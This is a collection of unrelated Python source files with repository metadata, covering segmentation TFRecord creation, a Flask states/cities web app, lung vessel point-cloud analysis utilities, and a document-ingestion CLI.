with open('{}/data_samples.json'.format(os.path.dirname(self.tfrecord_path)), 'w') as json_file:
json.dump(data, json_file)
def decode_strings(self, record):
images = tf.io.decode_jpeg(record['image'], 3)
labels = tf.io.decode_jpeg(record['label'], 3)
return images, labels
def read_tfrecords(self):
"""
        Read the segmentation tfrecords
:return: Returns a tuple of images and their label (images, labels)
"""
raw_dataset = tf.data.TFRecordDataset(self.tfrecord_path)
parsed_dataset = raw_dataset.map(self._parse_example_function)
decoded_dataset = parsed_dataset.map(self.decode_strings)
return decoded_dataset
if __name__ == "__main__":
classes = 150
dataset_name = "ade20k1"
train = TFRecordsSeg(image_dir="/volumes2/datasets/ADEChallengeData2016/images/training",
label_dir="/volumes2/datasets/ADEChallengeData2016/annotations/training",
tfrecord_path="/data/input/datasets/tf2_segmentation_tfrecords/{}_train.tfrecords".format(dataset_name),
classes=classes, img_pattern="*.jpg",
label_pattern="*.png")
# train = TFRecordsSeg(data_dir="/data/input/datasets/cityscape_processed", tfrecord_path="/volumes1/train.tfrecords", split='train')
val = TFRecordsSeg(image_dir="/volumes2/datasets/ADEChallengeData2016/images/validation",
label_dir="/volumes2/datasets/ADEChallengeData2016/annotations/validation",
tfrecord_path="/data/input/datasets/tf2_segmentation_tfrecords/{}_val.tfrecords".format(dataset_name),
classes=classes, img_pattern="*.jpg",
label_pattern="*.png")
train.write_tfrecords(training=True, dataset_name=dataset_name)
val.write_tfrecords()
# example = train
# image_dataset = example.read_tfrecords().repeat(10)
# cv2.namedWindow("img", 0)
# cv2.namedWindow("label", 0)
# for image_features in image_dataset:
# img = image_features[0][..., ::-1]
# label = image_features[1]
# print(np.unique(label.numpy()))
# insts = image_features[2]
# cv2.imshow("img", img.numpy())
# cv2.imshow("label", label.numpy()/classes)
# cv2.waitKey()
# print(image_features[0].shape, image_features[1].shape, image_features[2].shape)
# example.write_tfrecords()
# image_dataset = example.read_tfrecords().shuffle(10000)
#
# for image_features in image_dataset.take(10):
# print(image_features[0].shape, image_features[1].numpy())
|
AhmedBadar512/Badr_AI_Repo
|
utils/create_seg_tfrecords.py
|
create_seg_tfrecords.py
|
py
| 6,714 |
python
|
en
|
code
| 2 |
github-code
|
6
|
26234013938
|
#!/usr/bin/python3
"""Starts a basic flask web application"""
from flask import Flask, render_template
from markupsafe import escape
from models import storage
from models.state import State
from models.city import City
app = Flask(__name__)
@app.teardown_appcontext
def teardown(self):
"""procedure to run after request"""
storage.close()
@app.route("/states_list", strict_slashes=False)
def states_list():
"""Function to run when '/states_list' is accessed"""
states = [state for state in storage.all(State).values()]
states.sort(reverse=False, key=lambda state: state.name)
return (render_template('7-states_list.html', states=states))
@app.route("/cities_by_states", strict_slashes=False)
def cities_by_states():
"""Function to run when '/cities_by_states' is accessed"""
states = storage.all(State).values()
return (render_template('8-cities_by_states.html', states=states))
if (__name__ == '__main__'):
app.run(host='0.0.0.0', port=5000, debug=False)
|
AndyMSP/holbertonschool-AirBnB_clone_v2
|
web_flask/8-cities_by_states.py
|
8-cities_by_states.py
|
py
| 1,008 |
python
|
en
|
code
| 0 |
github-code
|
6
|
35515894022
|
import sys
sys.path.append('..')
from common.wrapped_input import wrapped_input
from common.clean_screen import clean_screen
__TERMINATE_MARKS__ = ['***', '****']
class Reader:
def __init__(self, args):
self.loop = True
def run(self, parser):
print("""
_ __ __,
( / ) o (
/--< _ __, , _ _ `. ,_ __ ,
/___// (_(_/(_(_/ / /_(___)_/|_)_/ (_/_
/| /
Interactive shell (/ '
==========================================
""")
last_input = ''
while last_input not in __TERMINATE_MARKS__:
last_input = wrapped_input()
if last_input in __TERMINATE_MARKS__:
print('[INFO] Querying, please wait...')
return last_input
parser.add(last_input)
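# Hedged usage sketch (class added for illustration; any object exposing an .add(line) method
# can act as the parser that Reader.run() feeds):
class _EchoParser:
    def add(self, line):
        print('[echo]', line)
# Reader(args=None).run(_EchoParser())  # reads input lines until '***' or '****' is entered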
|
ezPsycho/brainSpy-cli
|
src/readers/interactive.py
|
interactive.py
|
py
| 881 |
python
|
en
|
code
| 6 |
github-code
|
6
|
277770918
|
import os, sys
import subprocess
# os.environ['DISPLAY'] = ':99.0'
# os.environ['PYVISTA_OFF_SCREEN'] = 'true'
# os.environ['PYVISTA_USE_IPYVTK'] = 'true'
# bashCommand ="Xvfb :99 -screen 0 1024x768x24 > /dev/null 2>&1 & sleep 3"
# process = subprocess.Popen(bashCommand, stdout=subprocess.PIPE, shell=True)
# process.wait()
sys.path.insert(0, os.path.abspath("../../../.."))
from copy import deepcopy
import numpy as np
import torch
import pyvista as pv
import matplotlib.pyplot as plt
from shapmagn.global_variable import Shape, shape_type
from shapmagn.datasets.data_utils import read_json_into_list, get_obj, get_file_name
from shapmagn.shape.shape_pair_utils import create_shape_pair
from shapmagn.utils.obj_factory import obj_factory
from shapmagn.utils.visualizer import (
visualize_point_fea,
visualize_point_pair,
visualize_multi_point,
)
from shapmagn.utils.local_feature_extractor import *
def get_pair(source_path, target_path, expand_bch_dim=True, return_tensor=True):
get_obj_func = get_obj(
reader_obj,
normalizer_obj,
sampler_obj,
device,
expand_bch_dim=expand_bch_dim,
return_tensor=return_tensor,
)
source_obj, source_interval = get_obj_func(source_path)
target_obj, target_interval = get_obj_func(target_path)
return source_obj, target_obj
def plot_pair_weight_distribution(
source_weight, target_weight, use_log=False, title="", show=True, save_path=None
):
plt.style.use("bmh")
fig, ax = plt.subplots()
source_weight = np.log(source_weight) if use_log else source_weight
target_weight = np.log(target_weight) if use_log else target_weight
ax.hist(source_weight, bins=1000, density=0, histtype="stepfilled", alpha=0.7)
ax.hist(target_weight, bins=1000, density=0, histtype="stepfilled", alpha=0.5)
title += "weight" if not use_log else "log_weight"
ax.set_title(title)
if show:
plt.show()
if save_path:
plt.savefig(save_path, dpi=300)
plt.clf()
def plot_pair_weight_distribution_before_and_after_radius_matching(
source_weight1,
target_weight1,
source_weight2,
target_weight2,
use_log=False,
title="",
show=True,
save_path=None,
):
plt.style.use("bmh")
fig, axes = plt.subplots(nrows=2, ncols=2)
ax0, ax1, ax2, ax3 = axes.flatten()
source_weight_matched1 = matching_np_radius(source_weight1, target_weight1)
smw_sum1, sw_sum1, tp_sum1 = (
source_weight_matched1.sum(),
source_weight1.sum(),
target_weight1.sum(),
)
source_weight1 = np.log(source_weight1) if use_log else source_weight1
target_weight1 = np.log(target_weight1) if use_log else target_weight1
ax0.hist(source_weight1, bins=1000, density=0, histtype="stepfilled", alpha=0.7)
ax0.hist(target_weight1, bins=1000, density=0, histtype="stepfilled", alpha=0.5)
ax0.set_title("sw_sum: {:.3f}, tp_sum:{:.3f}".format(sw_sum1, tp_sum1), fontsize=10)
source_weight_matched1_norm = (
np.log(source_weight_matched1) if use_log else source_weight_matched1
)
ax1.hist(
source_weight_matched1_norm,
bins=1000,
density=0,
histtype="stepfilled",
alpha=0.7,
)
ax1.hist(target_weight1, bins=1000, density=0, histtype="stepfilled", alpha=0.5)
ax1.set_title(
"smw_sum: {:.3f}, tp_sum:{:.3f}".format(smw_sum1, tp_sum1), fontsize=10
)
source_weight_matched2 = matching_np_radius(source_weight2, target_weight2)
smw_sum2, sw_sum2, tp_sum2 = (
source_weight_matched2.sum(),
source_weight2.sum(),
target_weight2.sum(),
)
source_weight2 = np.log(source_weight2) if use_log else source_weight2
target_weight2 = np.log(target_weight2) if use_log else target_weight2
ax2.hist(source_weight2, bins=1000, density=0, histtype="stepfilled", alpha=0.7)
ax2.hist(target_weight2, bins=1000, density=0, histtype="stepfilled", alpha=0.5)
ax2.set_title("sw_sum: {:.3f}, tp_sum:{:.3f}".format(sw_sum2, tp_sum2), fontsize=10)
source_weight_matched2_norm = (
np.log(source_weight_matched2) if use_log else source_weight_matched2
)
ax3.hist(
source_weight_matched2_norm,
bins=1000,
density=0,
histtype="stepfilled",
alpha=0.7,
)
ax3.hist(target_weight2, bins=1000, density=0, histtype="stepfilled", alpha=0.5)
ax3.set_title(
"smw_sum: {:.3f}, tp_sum:{:.3f}".format(smw_sum2, tp_sum2), fontsize=10
)
fig.subplots_adjust(hspace=0.3)
fig.suptitle(title)
if show:
plt.show()
if save_path:
plt.savefig(save_path, dpi=300)
plt.clf()
return source_weight_matched1, source_weight_matched2
def get_half_lung(lung, normalize_weight=False):
weights = lung.weights.detach()
points = lung.points.detach()
pos_filter = points[..., 0] < 0
points = points[pos_filter][None]
weights = weights[pos_filter][None]
weights = weights
weights = weights / weights.sum() if normalize_weight else weights
half_lung = Shape()
half_lung.set_data(points=points, weights=weights)
return half_lung
def get_key_vessel(lung, thre=2e-05):
weights = lung.weights.detach()
points = lung.points.detach()
mask = (lung.weights > thre)[..., 0]
weights = weights[mask][None]
points = points[mask][None]
key_lung = Shape()
key_lung.set_data(points=points, weights=weights)
return key_lung
def sampled_via_radius(source, target):
min_npoints = min(source.npoints, target.npoints)
tw = target.weights.squeeze()
sw = source.weights.squeeze()
t_sorted, t_indices = torch.sort(tw, descending=True)
s_sorted, s_indices = torch.sort(sw, descending=True)
t_sampled_indices = t_indices[:min_npoints]
s_sampled_indices = s_indices[:min_npoints]
tp_sampled = target.points[:, t_sampled_indices]
sp_sampled = source.points[:, s_sampled_indices]
tw_sampled = target.weights[:, t_sampled_indices]
sw_sampled = source.weights[:, s_sampled_indices]
target_sampled, source_sampled = Shape(), Shape()
target_sampled.set_data(points=tp_sampled, weights=tw_sampled)
source_sampled.set_data(points=sp_sampled, weights=sw_sampled)
return source_sampled, target_sampled
def hist_match(source, template):
"""
Adjust the pixel values of a grayscale image such that its histogram
matches that of a target image.
Code adapted from
http://stackoverflow.com/questions/32655686/histogram-matching-of-two-images-in-python-2-x
Arguments:
-----------
source: np.ndarray
Image to transform; the histogram is computed over the flattened
array
template: np.ndarray
Template image; can have different dimensions to source
Returns:
-----------
matched: np.ndarray
The transformed output image
"""
oldshape = source.shape
source = source.ravel()
template = template.ravel()
# get the set of unique pixel values and their corresponding indices and
# counts
s_values, bin_idx, s_counts = np.unique(
source, return_inverse=True, return_counts=True
)
t_values, t_counts = np.unique(template, return_counts=True)
# take the cumsum of the counts and normalize by the number of pixels to
# get the empirical cumulative distribution functions for the source and
# template images (maps pixel value --> quantile)
s_quantiles = np.cumsum(s_counts).astype(np.float64)
s_quantiles /= s_quantiles[-1]
t_quantiles = np.cumsum(t_counts).astype(np.float64)
t_quantiles /= t_quantiles[-1]
# interpolate linearly to find the pixel values in the template image
# that correspond most closely to the quantiles in the source image
interp_t_values = np.interp(s_quantiles, t_quantiles, t_values)
return interp_t_values[bin_idx].reshape(oldshape)
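# Hedged worked example (helper added for illustration, not used elsewhere in this script):
# hist_match maps source quantiles onto template values.
def _hist_match_example():
    src = np.array([1.0, 1.0, 2.0, 3.0])       # source quantiles: [0.5, 0.75, 1.0]
    tmpl = np.array([10.0, 20.0, 20.0, 30.0])  # template values: 10, 20, 30
    return hist_match(src, tmpl)  # -> array([15., 15., 20., 30.])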
def matching_np_radius(source_weights, target_weights):
"""
:param source_weights: Nx1
:param target_weights: Mx1
    :return: matched source weights, Nx1
"""
ns = source_weights.shape[0]
sw = source_weights.squeeze()
tw = target_weights.squeeze()
range = [min(sw.min(), tw.min()), max(sw.max(), tw.max())]
resol = 10000
interp = (range[1] - range[0]) / resol
bins = np.linspace(range[0] - 2 * interp, range[1] + 2 * interp, resol)
sw_indice = np.digitize(sw, bins, right=False)
tw_indice = np.digitize(tw, bins, right=False)
sw_digitize = bins[sw_indice]
tw_digitize = bins[tw_indice]
sw_transformed = hist_match(sw_digitize, tw_digitize)
return sw_transformed.reshape(ns, 1).astype(np.float32)
def matching_shape_radius(source, target, sampled_by_radius=False, show=True):
if sampled_by_radius:
source, target = sampled_via_radius(source, target)
device = source.points.device
sn = source.npoints
tn = target.npoints
sw = source.weights.squeeze().cpu().numpy()
tw = target.weights.squeeze().cpu().numpy()
range = [min(sw.min(), tw.min()), max(sw.max(), tw.max())]
resol = 10000
interp = (range[1] - range[0]) / resol
bins = np.linspace(range[0] - 2 * interp, range[1] + 2 * interp, resol)
sw_indice = np.digitize(sw, bins, right=False)
tw_indice = np.digitize(tw, bins, right=False)
sw_digitize = bins[sw_indice]
tw_digitize = bins[tw_indice]
sw_transformed = hist_match(sw_digitize, tw_digitize)
if show:
plot_pair_weight_distribution(sw_digitize, tw_digitize, use_log=True)
plot_pair_weight_distribution(sw_transformed, tw_digitize, use_log=True)
visualize_point_pair(
source.points,
target.points,
source.weights,
target.weights,
title1="source(before)",
title2="target(before)",
)
visualize_point_pair(
source.points,
target.points,
sw_transformed,
tw_digitize,
title1="source(after)",
title2="target(after)",
)
source.weights = (
torch.tensor(sw_transformed.astype(np.float32)).to(device).view(1, sn, 1)
)
target.weights = (
torch.tensor(tw_digitize.astype(np.float32)).to(device).view(1, tn, 1)
)
return source, target
def source_weight_transform(weights, compute_on_half_lung=False):
weights = weights * 1
weights_cp = deepcopy(weights)
thre = 1.9e-05
thre = thre # if not compute_on_half_lung else thre*2
weights[weights_cp < thre] = 1e-7
return weights
def flowed_weight_transform(weights, compute_on_half_lung=False):
weights = weights * 1
weights_cp = deepcopy(weights)
thre = 1.9e-05
thre = thre # if not compute_on_half_lung else thre * 2
weights[weights_cp < thre] = 1e-7
return weights
def target_weight_transform(weights, compute_on_half_lung=False):
weights = weights * 1
weights_cp = deepcopy(weights)
thre = 1.9e-05
thre = thre # if not compute_on_half_lung else thre * 2
weights[weights_cp < thre] = 1e-7
# weights[weights_cp > 1.1e-05] = 1e-7
return weights
def pair_shape_transformer(init_thres=2.9e-5, nstep=5):
# todo the next step of the transformer is to return a smoothed mask to constrain the movement of the lung
def transform(source, target, cur_step):
min_weights = min(torch.min(source.weights), torch.min(target.weights))
max_weights = min(torch.max(source.weights), torch.max(target.weights))
max_weights = max_weights.item()
cur_step = cur_step.item()
assert init_thres > min_weights
thres = init_thres - (init_thres - min_weights) / nstep * cur_step
s_weights = source.weights.clone()
t_weights = target.weights.clone()
s_weights[source.weights < thres] = 1e-7
t_weights[target.weights < thres] = 1e-7
s_transformed, t_transformed = Shape(), Shape()
s_transformed.set_data(
points=source.points, weights=s_weights, pointfea=source.pointfea
)
t_transformed.set_data(
points=target.points, weights=t_weights, pointfea=target.pointfea
)
print("the weight of the lung pair are updated")
return s_transformed, t_transformed
return transform
def capture_plotter(save_source=False):
from shapmagn.utils.visualizer import visualize_point_pair_overlap
inner_count = 0
def save(record_path, name_suffix, shape_pair):
nonlocal inner_count
source, flowed, target = shape_pair.source, shape_pair.flowed, shape_pair.target
for sp, fp, tp, sw, fw, tw, pair_name in zip(
source.points,
flowed.points,
target.points,
source.weights,
flowed.weights,
target.weights,
pair_name_list,
):
if inner_count == 0 or save_source:
path = os.path.join(
record_path, "source_target" + "_" + name_suffix + ".png"
)
visualize_point_pair_overlap(
sp,
tp,
flowed_weight_transform(fw, True),
target_weight_transform(tw, True),
title1="source",
title2="target",
rgb_on=False,
saving_capture_path=path,
show=False,
)
path_1 = os.path.join(
record_path,
pair_name + "_flowed_target" + "_main_" + name_suffix + ".png",
)
path_2 = os.path.join(
record_path,
pair_name + "_flowed_target" + "_whole_" + name_suffix + ".png",
)
visualize_point_pair_overlap(
fp,
tp,
flowed_weight_transform(fw, True),
target_weight_transform(tw, True),
title1="flowed",
title2="target",
rgb_on=False,
saving_capture_path=path_1,
show=False,
)
visualize_point_pair_overlap(
fp,
tp,
fw,
tw,
title1="flowed",
title2="target",
rgb_on=False,
saving_capture_path=path_2,
show=False,
)
inner_count += 1
return save
def lung_isolated_leaf_clean_up(
lung, radius=0.032, principle_weight=None, normalize_weights=True
):
points = lung.points.detach()
weights = lung.weights.detach()
mass, dev, cov = compute_local_moments(points, radius=radius)
eigenvector_main = compute_local_fea_from_moments(
"eigenvector_main", weights, mass, dev, cov
)
filter = mass[..., 0].squeeze() > 2
to_remove = ~filter
print(
"In the first step, num of points are removed {}, {}".format(
torch.sum(to_remove), torch.sum(to_remove) / len(filter)
)
)
points_toremove = points[:, to_remove]
mass_toremove = mass[:, to_remove]
mass = mass[:, filter]
points = points[:, filter]
weights = weights[:, filter]
eigenvector_main = eigenvector_main[:, filter]
visualize_point_fea_with_arrow(points, mass, eigenvector_main * 0.01, rgb_on=False)
visualize_point_overlap(
points,
points_toremove,
mass,
mass_toremove,
title="cleaned points",
point_size=(10, 20),
rgb_on=False,
opacity=("linear", 1.0),
)
Gamma = compute_anisotropic_gamma_from_points(
points,
cov_sigma_scale=radius,
aniso_kernel_scale=radius,
principle_weight=principle_weight,
)
mass, dev, cov = compute_aniso_local_moments(points, Gamma)
eigenvector_main = compute_local_fea_from_moments(
"eigenvector_main", weights, mass, dev, cov
)
filter = mass[..., 0].squeeze() > 2.5
to_remove = ~filter
print(
"In the second step, num of points are removed {}, {}".format(
torch.sum(to_remove), torch.sum(to_remove) / len(filter)
)
)
points_toremove = points[:, to_remove]
mass_toremove = mass[:, to_remove]
mass = mass[:, filter]
points = points[:, filter]
weights = weights[:, filter]
eigenvector_main = eigenvector_main[:, filter]
visualize_point_fea_with_arrow(points, mass, eigenvector_main * 0.01, rgb_on=False)
visualize_point_overlap(
points,
points_toremove,
mass,
mass_toremove,
title="cleaned points",
point_size=(10, 20),
rgb_on=False,
opacity=("linear", 1.0),
)
Gamma = compute_anisotropic_gamma_from_points(
points,
cov_sigma_scale=radius,
aniso_kernel_scale=radius,
principle_weight=principle_weight,
)
mass, dev, cov = compute_aniso_local_moments(points, Gamma)
eigenvector_main = compute_local_fea_from_moments(
"eigenvector_main", weights, mass, dev, cov
)
filter = mass[..., 0].squeeze() > 3
to_remove = ~filter
print(
"In the third step, num of points are removed {}, {}".format(
torch.sum(to_remove), torch.sum(to_remove) / len(filter)
)
)
points_toremove = points[:, to_remove]
mass_toremove = mass[:, to_remove]
mass = mass[:, filter]
points = points[:, filter]
weights = weights[:, filter]
eigenvector_main = eigenvector_main[:, filter]
visualize_point_fea_with_arrow(points, mass, eigenvector_main * 0.01, rgb_on=False)
visualize_point_overlap(
points,
points_toremove,
mass,
mass_toremove,
title="cleaned points",
point_size=(10, 20),
rgb_on=False,
opacity=("linear", 1.0),
)
cleaned_lung = Shape()
cleaned_lung.points, cleaned_lung.weights = (
points,
weights / torch.sum(weights) if normalize_weights else weights,
)
return cleaned_lung
def analysis_large_vessel(
source,
target,
source_weight_transform=source_weight_transform,
target_weight_transform=target_weight_transform,
title1="source",
title2="target",
):
source_points, source_weights, = (
source.points.detach().cpu(),
source.weights.detach().cpu(),
)
target_points, target_weights, = (
target.points.detach().cpu(),
target.weights.detach().cpu(),
)
plot_pair_weight_distribution(
source_weight_transform(source_weights).squeeze().numpy(),
target_weight_transform(target_weights).squeeze().numpy(),
use_log=True,
)
visualize_point_pair(
source_points,
target_points,
source_weight_transform(source_weights),
target_weight_transform(target_weights),
title1=title1,
title2=title2,
)
def compute_atlas(weight_list):
atlas_weight = np.concatenate(weight_list)
return atlas_weight
def transfer_radius_and_save_sample(
cur_obj, atlas_distri, radius_transfered_saing_path
):
cur_obj["weights"] = matching_np_radius(cur_obj["weights"], atlas_distri)
data = pv.PolyData(cur_obj["points"])
for key, item in cur_obj.items():
if key not in ["points"]:
data.point_arrays[key] = item
data.save(radius_transfered_saing_path)
return cur_obj
if __name__ == "__main__":
assert (
shape_type == "pointcloud"
), "set shape_type = 'pointcloud' in global_variable.py"
device = torch.device("cpu") # cuda:0 cpu
reader_obj = "lung_dataloader_utils.lung_reader()"
normalizer_obj = (
"lung_dataloader_utils.lung_normalizer(weight_scale=60000,scale=[100,100,100])"
)
phase = "train"
use_local_mount = False
remote_mount_transfer = lambda x: x.replace(
"/playpen-raid1", "/home/zyshen/remote/llr11_mount"
)
path_transfer = (
(lambda x: remote_mount_transfer(x)) if use_local_mount else (lambda x: x)
)
dataset_json_path = (
"/playpen-raid1/zyshen/data/lung_expri/{}/pair_data.json".format(phase)
)
dataset_json_path = path_transfer(dataset_json_path)
sampler_obj = "lung_dataloader_utils.lung_sampler( method='voxelgrid',scale=0.0003)"
get_obj_func = get_obj(
reader_obj,
normalizer_obj,
sampler_obj,
device,
expand_bch_dim=False,
return_tensor=False,
)
altas_path = "/playpen-raid1/Data/UNC_vesselParticles/10067M_INSP_STD_MSM_COPD_wholeLungVesselParticles.vtk"
altas_path = path_transfer(altas_path)
atlas, _ = get_obj_func(altas_path)
sampler_obj = "lung_dataloader_utils.lung_sampler( method='combined',scale=0.0003,num_sample=30000,sampled_by_weight=True)"
get_obj_func = get_obj(
reader_obj,
normalizer_obj,
sampler_obj,
device,
expand_bch_dim=False,
return_tensor=False,
)
sampled_atlas, _ = get_obj_func(altas_path)
radius_transfered_saing_path = "/playpen-raid1/zyshen/data/lung_atlas/{}".format(
phase
)
radius_transfered_saing_path = path_transfer(radius_transfered_saing_path)
os.makedirs(radius_transfered_saing_path, exist_ok=True)
pair_name_list, pair_info_list = read_json_into_list(dataset_json_path)
pair_path_list = [
[pair_info["source"]["data_path"], pair_info["target"]["data_path"]]
for pair_info in pair_info_list
]
pair_id = 3
output_path = "/playpen-raid1/zyshen/data/lung_data_analysis/val"
for pair_id in range(len(pair_name_list)):
pair_path = pair_path_list[pair_id]
pair_path = [path_transfer(path) for path in pair_path]
sampler_obj = (
"lung_dataloader_utils.lung_sampler( method='voxelgrid',scale=0.0003)"
)
########################
plot_saving_path = os.path.join(radius_transfered_saing_path, "origin_plots")
os.makedirs(plot_saving_path, exist_ok=True)
source_path, target_path = pair_path_list[pair_id]
source, target = get_pair(
source_path, target_path, expand_bch_dim=False, return_tensor=False
)
saving_path = os.path.join(plot_saving_path, pair_name_list[pair_id] + ".png")
camera_pos = [
(-4.924379645467042, 2.17374925796456, 1.5003730890759344),
(0.0, 0.0, 0.0),
(0.40133888001174545, 0.31574165540339943, 0.8597873634998591),
]
visualize_point_pair(
source["points"],
target["points"],
source["weights"],
target["weights"],
title1="source",
title2="target",
saving_capture_path=saving_path,
camera_pos=camera_pos,
show=False,
)
plot_saving_path = os.path.join(radius_transfered_saing_path, "plots")
os.makedirs(plot_saving_path, exist_ok=True)
# vtk_saving_path = os.path.join(radius_transfered_saing_path,"data")
# os.makedirs(vtk_saving_path,exist_ok=True)
# saving_path = os.path.join(vtk_saving_path,get_file_name(source_path)+".vtk")
# mapped_source = transfer_radius_and_save_sample(source, atlas["weights"], saving_path)
# saving_path = os.path.join(vtk_saving_path,get_file_name(target_path)+".vtk")
# mapped_target = transfer_radius_and_save_sample(target, atlas["weights"], saving_path)
# plot_saving_path = os.path.join(radius_transfered_saing_path, "plots")
# source_vg_weight, target_vg_weight = source["weights"], target["weights"]
# sampler_obj ="lung_dataloader_utils.lung_sampler( method='combined',scale=0.0003,num_sample=30000,sampled_by_weight=True)"
# source, target = get_pair(source_path, target_path, expand_bch_dim=False, return_tensor=False)
# source_combined_weight, target_combined_weight = source["weights"], target["weights"]
# os.makedirs(plot_saving_path,exist_ok=True)
# saving_file_path = os.path.join(plot_saving_path,pair_info_list[pair_id]["source"]["name"]+"_weights_distribution.png")
# title = pair_info_list[pair_id]["source"]["name"] + "_" +"n_sp:{} ".format(len(source_vg_weight))+"n_tp:{}".format(len(atlas["weights"]))
# _,source_combined_mapped_weight =plot_pair_weight_distribution_before_and_after_radius_matching(source_vg_weight, atlas["weights"],source_combined_weight,sampled_atlas["weights"], use_log=True,title=title,show=False,save_path=saving_file_path)
# saving_file_path = os.path.join(plot_saving_path, pair_info_list[pair_id]["target"]["name"] + "_weights_distribution.png")
# title = pair_info_list[pair_id]["target"]["name"] + "_" + "n_sp:{} ".format(len(target_vg_weight)) + "n_tp:{}".format(len(atlas["weights"]))
# _,target_combined_mapped_weight =plot_pair_weight_distribution_before_and_after_radius_matching(target_vg_weight, atlas["weights"], target_combined_weight, sampled_atlas["weights"],use_log=True, title=title, show=False,save_path=saving_file_path)
# saving_path = os.path.join(plot_saving_path, pair_name_list[pair_id]+"_mapped.png")
# camera_pos = [(-4.924379645467042, 2.17374925796456, 1.5003730890759344), (0.0, 0.0, 0.0),
# (0.40133888001174545, 0.31574165540339943, 0.8597873634998591)]
# visualize_point_pair(source["points"], target["points"],
# source_combined_mapped_weight,
# target_combined_mapped_weight,
# title1="source", title2="target", rgb_on=False,saving_capture_path=saving_path,camera_pos=camera_pos,show=False )
# source, target = get_pair(*pair_path)
# source_vg_weight, target_vg_weight = source["weights"], target["weights"]
# title = pair_name_list[pair_id] + "_" +"n_sp:{} ".format(len(source_vg_weight))+"n_tp:{}".format(len(target_vg_weight))
# sampler_obj ="lung_dataloader_utils.lung_sampler( method='combined',scale=0.0003,num_sample=30000,sampled_by_weight=True)"
# source, target = get_pair(source_path, target_path, expand_bch_dim=False, return_tensor=False)
# source_combined_weight, target_combined_weight = source["weights"], target["weights"]
# plot_saving_path = os.path.join(radius_transfered_saing_path,"plots")
# saving_folder_path = os.path.join(output_path,pair_name_list[pair_id])
# os.makedirs(saving_folder_path,exist_ok=True)
# saving_file_path = os.path.join(saving_folder_path,pair_name_list[pair_id]+"_weights_distribution.png")
# plot_pair_weight_distribution_before_and_after_radius_matching(source_vg_weight, target_vg_weight,source_combined_weight,target_combined_weight, use_log=True,title=title,show=False,save_path=saving_file_path)
#
# visualize_point_pair(source["points"], target["points"],
# source["weights"],
# target["weights"],
# title1="source", title2="target", rgb_on=False)
#
#
# shape_pair = create_shape_pair(source, target)
# source_half = get_half_lung(source)
# target_half = get_half_lung(target)
# cleaned_source_half = lung_isolated_leaf_clean_up(source_half,radius=0.02, principle_weight=[2,1,1], normalize_weights=False)
# # visualize_point_pair(source_half.points, cleaned_source_half.points,
# # source_weight_transform(source_half.weights),
# # source_weight_transform(cleaned_source_half.weights),
# # title1="source", title2="cleaned_source", rgb_on=False)
# #
# # plot_pair_weight_distribution(source_weight_transform(source_half.weights).cpu().squeeze().numpy(),
# # target_weight_transform(target_half.weights).cpu().squeeze().numpy(),
# # use_log=True)
#
# visualize_point_pair(source_half.points, target_half.points,
# source_weight_transform(source_half.weights),
# target_weight_transform(target_half.weights),
# title1="source", title2="target", rgb_on=False)
|
uncbiag/shapmagn
|
shapmagn/experiments/datasets/lung/lung_data_analysis.py
|
lung_data_analysis.py
|
py
| 28,299 |
python
|
en
|
code
| 94 |
github-code
|
6
|
6460552932
|
import sys
import click
import logging
from pprint import pprint
from ftmstore import get_dataset
from servicelayer.cache import get_redis, get_fakeredis
from servicelayer.logs import configure_logging
from servicelayer.jobs import Job, Dataset
from servicelayer import settings as sl_settings
from servicelayer.archive.util import ensure_path
from ingestors import settings
from ingestors.manager import Manager
from ingestors.directory import DirectoryIngestor
from ingestors.analysis import Analyzer
from ingestors.worker import IngestWorker, OP_ANALYZE, OP_INGEST
log = logging.getLogger(__name__)
STAGES = [OP_ANALYZE, OP_INGEST]
@click.group()
def cli():
configure_logging(level=logging.DEBUG)
@cli.command()
@click.option("-s", "--sync", is_flag=True, default=False, help="Run without threads")
def process(sync):
"""Start the queue and process tasks as they come. Blocks while waiting"""
num_threads = None if sync else sl_settings.WORKER_THREADS
worker = IngestWorker(stages=STAGES, num_threads=num_threads)
code = worker.run()
sys.exit(code)
@cli.command()
@click.argument("dataset")
def cancel(dataset):
"""Delete scheduled tasks for given dataset"""
conn = get_redis()
Dataset(conn, dataset).cancel()
@cli.command()
def killthekitten():
"""Completely kill redis contents."""
conn = get_redis()
conn.flushall()
def _ingest_path(db, conn, dataset, path, languages=[]):
context = {"languages": languages}
job = Job.create(conn, dataset)
stage = job.get_stage(OP_INGEST)
manager = Manager(db, stage, context)
path = ensure_path(path)
if path is not None:
if path.is_file():
entity = manager.make_entity("Document")
checksum = manager.store(path)
entity.set("contentHash", checksum)
entity.make_id(checksum)
entity.set("fileName", path.name)
log.info("Queue: %r", entity.to_dict())
manager.queue_entity(entity)
if path.is_dir():
DirectoryIngestor.crawl(manager, path)
manager.close()
@cli.command()
@click.option("--languages", multiple=True, help="3-letter language code (ISO 639)")
@click.option("--dataset", required=True, help="Name of the dataset")
@click.argument("path", type=click.Path(exists=True))
def ingest(path, dataset, languages=None):
"""Queue a set of files for ingest."""
conn = get_redis()
db = get_dataset(dataset, OP_INGEST)
_ingest_path(db, conn, dataset, path, languages=languages)
@cli.command()
@click.option("--dataset", required=True, help="Name of the dataset")
def analyze(dataset):
db = get_dataset(dataset, OP_ANALYZE)
analyzer = None
for entity in db.partials():
if analyzer is None or analyzer.entity.id != entity.id:
if analyzer is not None:
analyzer.flush()
# log.debug("Analyze: %r", entity)
analyzer = Analyzer(db, entity, {})
analyzer.feed(entity)
if analyzer is not None:
analyzer.flush()
@cli.command()
@click.option("--languages", multiple=True, help="3-letter language code (ISO 639)")
@click.argument("path", type=click.Path(exists=True))
def debug(path, languages=None):
"""Debug the ingest for the given path."""
conn = get_fakeredis()
settings.fts.DATABASE_URI = "sqlite:////tmp/debug.sqlite3"
db = get_dataset("debug", origin=OP_INGEST, database_uri=settings.fts.DATABASE_URI)
db.delete()
_ingest_path(db, conn, "debug", path, languages=languages)
worker = IngestWorker(conn=conn, stages=STAGES)
worker.sync()
for entity in db.iterate():
pprint(entity.to_dict())
if __name__ == "__main__":
cli()
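# --- Usage sketch (added for illustration; not part of the original module) ---
# A hedged example of exercising the click group above through click's test
# runner. "example.pdf" is a placeholder path (the argument is declared with
# exists=True, so the file must be present), and the non-debug commands would
# additionally need a reachable Redis and ftm store.
def _demo_cli():
    from click.testing import CliRunner
    runner = CliRunner()
    result = runner.invoke(cli, ["debug", "example.pdf"])
    print(result.exit_code, result.output)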
|
alephdata/ingest-file
|
ingestors/cli.py
|
cli.py
|
py
| 3,714 |
python
|
en
|
code
| 45 |
github-code
|
6
|
5119440044
|
from netaddr import IPNetwork, IPAddress
import logging
from pymongo import MongoClient
logger = logging.getLogger( "ucn_logger" )
